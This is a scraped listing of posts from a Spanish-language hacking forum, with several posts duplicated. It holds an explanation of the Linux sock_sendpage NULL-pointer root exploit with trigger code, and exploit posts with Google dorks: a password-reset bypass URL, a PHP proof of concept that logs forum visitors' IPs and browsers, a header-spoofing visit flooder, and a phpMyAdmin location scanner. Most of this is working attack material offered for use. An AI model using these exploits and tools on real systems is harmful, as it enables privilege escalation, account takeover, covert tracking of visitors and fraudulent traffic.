en net/socket.c y el problema particularmente se encuentra en la llamada a sendpage() que no
verifica si el puntero se ha inicializado.
static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;
sock = file->private_data;
flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;
return sock->ops->sendpage(sock, page, offset, size, flags);
}
static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;
sock = file->private_data;
flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;
return sock->ops->sendpage(sock, page, offset, size, flags);
}
Hemos visto que no se verifica si el puntero a sendpage() esta correctamente inicializado. Sera necesario ahora, encontrar situaciones en las que el puntero a la función sendpage() no se haya inicialiado.
Tavis Ormandy y Julien Tinnes (De el equipo de seguridad informatica de Google) en su investigación localizaron deficiencias en la incialización del puntero para la macro SOCKOPS_WRAP, definida en include/linux/net.h, que incluye PF_APPLETALK, PF_IPX, PF_IRDA, PF_X25 y PF_AX25. Tambien encontraron deficiencias en otros protocolos como PF_BLUETOOTH, PF_IUCV, PF_INET6 (con IPPROTO_SCTP), PF_PPPOX y PF_ISDN.
Prestemos atencion al protocolo Bluetooth, ubicado en net/bluetooth/bnep/sock.c donde encontraremos la estructura bnet_sock_ops en la que no se inicializa sendpage con sock_no_sendpage(), en ese caso quedara apuntando a NULL.
static const struct proto_ops bnep_sock_ops = {
.family = PF_BLUETOOTH,
.owner = THIS_MODULE,
.release = bnep_sock_release,
.ioctl = bnep_sock_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = bnep_sock_compat_ioctl,
#endif
.bind = sock_no_bind,
.getname = sock_no_getname,
.sendmsg = sock_no_sendmsg,
.recvmsg = sock_no_recvmsg,
.poll = sock_no_poll,
.listen = sock_no_listen,
.shutdown = sock_no_shutdown,
.setsockopt = sock_no_setsockopt,
.getsockopt = sock_no_getsockopt,
.connect = sock_no_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.mmap = sock_no_mmap
};
Veamos la macro SOCOPS_WRAP, casi no se nota el error pero prestemos atencion a la ultima linea.
static const struct proto_ops SOCKOPS_WRAPPED(ipx_dgram_ops) = {
.family = PF_IPX,
.owner = THIS_MODULE,
.release = ipx_release,
.bind = ipx_bind,
.connect = ipx_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.getname = ipx_getname,
.poll = datagram_poll,
.ioctl = ipx_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = ipx_compat_ioctl,
#endif
.listen = sock_no_listen,
.shutdown = sock_no_shutdown, /* FIXME: support shutdown */
.setsockopt = ipx_setsockopt,
.getsockopt = ipx_getsockopt,
.sendmsg = ipx_sendmsg,
.recvmsg = ipx_recvmsg,
.mmap = sock_no_mmap,
.sendpage = sock_no_sendpage,
};
Bueno ahora que conocemos donde esta el error, veamos como aprovecharlo...
Para tal caso debemos contar con una funcion que podamos ejecutar en espacio de usuario
que use la funcion sock_sendpage(), existen muchas...la propuesta en este caso es sendfile().
Forzaremos el uso de sendpage() con la siguente secuencia:
/* ... */
int fdin = mkstemp(template);
int fdout = socket(PF_PPPOX, SOCK_DGRAM, 0);
unlink(template);
ftruncate(fdin, PAGE_SIZE);
sendfile(fdout, fdin, NULL, PAGE_SIZE);
/* ... */Cuando se ejecute la funcion sendpage(), si no esta inicializada y apuntando a NULL,
el kernel tratara de ejecutar las instrucciones que hay en la direccion 0, mapeando dicha
direccion y almacenando alli lo que queremos que ejecute el kernel podemos sacar provecho
de dicha vulnerabilidad.
De este modo cuando dicho kernel intente ejecutar sendpage() en realidad ejecutara nuestro codigo
en el espacio de kernel, asi podremos escalar privilegios, haciendo que el codigo almacenado en la
direccion 0 ponga nuestro uid a 0 (uid=0 privilegios de root ^^)
Espero que se haya entendido y ahora se comprenda a fondo de como se aprovecha este maravilloso fallo.
#274
Bugs y Exploits / PHP MatchMaker Remote User Reset Password Vulnerability
Agosto 27, 2011, 05:43:42 PM# Exploit Title : PHP MatchMaker Remote User Reset Password Vulnerability
# Google Dork: allintext: Powered by PHP MatchMaker
# Date: 23/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.deltascripts.com/phpmatchmaker/
# Tested on: Linux
Dedicado a Duraznito y en especial a mi madre que es lo mas grande que hay :p
[POC]
If you know the email of any user can reset your password for an unlimited
visiting the following url
http://localhost/reset.php?email=[[email protected]]&submit=Continue #275
Bugs y Exploits / Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
Agosto 27, 2011, 05:33:54 PM
# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Software Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.
Código: text
[Content of pwned.txt]
/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php
VICTIM: 207.182.149.243
info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Software Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.
<?php
// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
$ip = $_SERVER['REMOTE_ADDR'];
$so= $_SERVER['HTTP_USER_AGENT'];
$lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url= $_SERVER['PHP_SELF'];
$path= $_SERVER['DOCUMENT_ROOT'];
$archivo = 'pwned.txt';
$fp = fopen($archivo, "a");
$string = "
$path$url
VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>
[Content of pwned.txt]
/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php
VICTIM: 207.182.149.243
info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0
#276
Bugs y Exploits / Small Pirate <= 2.3 Incorrect Flood Filter Headers
Agosto 27, 2011, 05:33:04 PM
# Exploit Title: Small Pirate <= 2.3 Incorrect Flood Filter Headers
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Software Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
This vulnerability takes advantage of randomly generated headers and thus generating false origin falsifies visits
[PoC]
Código: text
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Software Link: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
# Tested on: Linux
[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
Lucas Apa, Juan Urbano, Sunplace, KikoArg
Knet, Harakiri, Luciano Lapporta Podazza,
SIR y en especial a mi madre.
This vulnerability takes advantage of randomly generated headers and thus generating false origin falsifies visits
[PoC]
<?php
//////config//////////////
$flood = 0;
$host = "domain.com";
$path = "/indexphp?referredby=[id]"; // change id!!
////////////////////////////////
////////FLOODER////////////////
while ( $flood < 1000) {
$rangoip1 = rand(1,254);
$rangoip2 = rand(1,254);
$rangoip3 = rand(1,254);
$rangoip4 = rand(1,254);
$ipgenerada = $rangoip1.".".$rangoip2.".".$rangoip3.".".$rangoip4;
$da = fsockopen($host, 80, $errno, $errstr, 30);
if (!$da) {
echo "$errstr ($errno)\n";
} else {
$salida = "GET http://".$host."$path HTTP/1.1\r\n";
$salida .= "Host: ".$host."\r\n";
$salida .= "X-Forwarded-For: $ipgenerada\r\n";
$salida .= "Via: CB-Prx\r\n";
$salida .= "Connection: Close\r\n\r\n";
fwrite($da, $salida);
fclose($da);
$flood++;
}
echo "Flooded a $host$path exitoso con la ip $ipgenerada<br>";
}
?>
#277
Back-end / Utilizar imagenes encodeadas en base64
Agosto 26, 2011, 04:44:25 AM
Bueno hoy para no subir a ningun servidor de imagenes meti el contenido de una imagen en una variable codificada en base64.
Para eso les dejo una herramienta que codee hace ratito para hacer el trabajo mas facil.
Pegan la ruta o link de la imagen que quieren encondear y le dan en el boton img!
Código: php
una vez que obtiene el codigo que seria algo como esto:
Código: text
Pueden guardar el contenido de la textarea en una variable, y para utilzarla tienen que poner:
Código: text
Eso es todo, espero que sea de utilidad.
Para eso les dejo una herramienta que codee hace ratito para hacer el trabajo mas facil.
Pegan la ruta o link de la imagen que quieren encondear y le dan en el boton img!
<html>
<head>
<style>
body
{
background-color:#CCC;
}
</style>
<title>Base64 img encoder.</title>
</head>
<body>
<?php
$img=$_POST['img'];
if(isset($img)&&($img!= ""))
{
$contents = file_get_contents($img);
$base64 = base64_encode($contents);
$img_encoded= 'data:image/png;base64,'.$base64;
}
?>
<center>
<form name="pr" action="" method="post">
<table align="center">
<td><input id="boton" type="text" name="img" size="50" maxlength="110" value=""></td>
<td></td>
<td><input id="boton" type="submit" name="submit" value="img!"></td>
</table>
<textarea cols="100" rows="30" name="texto">
<?php echo $img_encoded; ?>
</textarea>
</center>
</body>
</html>
una vez que obtiene el codigo que seria algo como esto:
data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAv.......Pueden guardar el contenido de la textarea en una variable, y para utilzarla tienen que poner:
<img src="'.$imagen_encoded_b64.'">Eso es todo, espero que sea de utilidad.
#278
Back-end / PMA Finder
Agosto 26, 2011, 04:36:43 AM
Herramienta que busca la ubicacion del phpmyadmin mediante un array que contiene los nombres de directorios mas comunes. Tambien se le pueden agregar mas.
Código: php
<html>
<title>0x3a PMA Finder</title>
<style type="text/css">
body{
background: #000;
color: #FFF;
}
a:visited{
color:#FFF;
text-decoration: none;
}
a:link{
color:#FFF;
text-decoration: none;
}
a:hover{
color:#FF0000;
text-decoration: blink;
}
input,option{
font-family: verdana, sans-serif;
font-size: 16pt;
border: gray 2px solid;
}
#links{
margin:0 auto;
width:860px;
border-color: #E8E8E8;
text-align: right;
}
</style>
<body>
<div id="links">
<center>
<img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
<form action ="" method="post">
URL : <input type ="text" name="site"/>
<input type = "submit" value="PWN!" />
</form>
<?php
/**
*
*
* @author Daniel Godoy
* @copyright 2011
* @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*
**/
$site = $_POST['site'];
$list = array('/phpMyAdmin/', '/phpmyadmin/','/PMA/','/pma/','/admin/','/dbadmin/','/mysql/', '/myadmin/', '/phpmyadmin2/','/phpMyAdmin2/', '/phpMyAdmin-2/',
'/php-my-admin/','/phpMyAdmin-2.2.3/', '/phpMyAdmin-2.2.6/', '/phpMyAdmin-2.5.1/', '/phpMyAdmin-2.5.4/', '/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/', '/phpMyAdmin-2.5.5/', '/phpMyAdmin-2.5.5-pl1/', '/phpMyAdmin-2.5.6-rc1/', '/phpMyAdmin-2.5.6-rc2/', '/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/', '/phpMyAdmin-2.5.7-pl1/', '/phpMyAdmin-2.6.0-alpha/', '/phpMyAdmin-2.6.0-alpha2/', '/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/', '/phpMyAdmin-2.6.0-rc1/', '/phpMyAdmin-2.6.0-rc2/', '/phpMyAdmin-2.6.0-rc3/','/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/', '/phpMyAdmin-2.6.0-pl2/', '/phpMyAdmin-2.6.0-pl3/', '/phpMyAdmin-2.6.1-rc1/', '/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/', '/phpMyAdmin-2.6.1-pl1/', '/phpMyAdmin-2.6.1-pl2/', '/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/', '/phpMyAdmin-2.6.2-rc1/', '/phpMyAdmin-2.6.2/', '/phpMyAdmin-2.6.2-pl1/', '/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/', '/phpMyAdmin-2.6.3/', '/phpMyAdmin-2.6.3-pl1/', '/phpMyAdmin-2.6.4-rc1/', '/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/', '/phpMyAdmin-2.6.4-pl3/', '/phpMyAdmin-2.6.4-pl4/', '/phpMyAdmin-2.6.4/', '/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/', '/phpMyAdmin-2.7.0-pl1/', '/phpMyAdmin-2.7.0-pl2/', '/phpMyAdmin-2.7.0/', '/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/', '/phpMyAdmin-2.8.0-rc2/', '/phpMyAdmin-2.8.0/', '/phpMyAdmin-2.8.0.1/', '/phpMyAdmin-2.8.0.2/', '/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/', '/phpMyAdmin-2.8.1-rc1/', '/phpMyAdmin-2.8.1/', '/phpMyAdmin-2.8.2/', '/sqlmanager/', '/mysqlmanager/', '/p/m/a/',
'/PMA2005/', '/pma2005/', '/phpmanager/', '/php-myadmin/', '/phpmy-admin/', '/webadmin/', '/sqlweb/', '/websql/', '/webdb/', '/mysqladmin/',
'/mysql-admin/','/mya/',
);
if(isset($site)){
foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
if (preg_match("/200 OK/", $result)){
flush();
echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
ob_flush();
}
else if (preg_match("/401 Unauthorized/", $result)) {
flush();
echo '<br/> [!]<a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
ob_flush();
}
}
}
?>
</center>
</div>
</body>
</html>
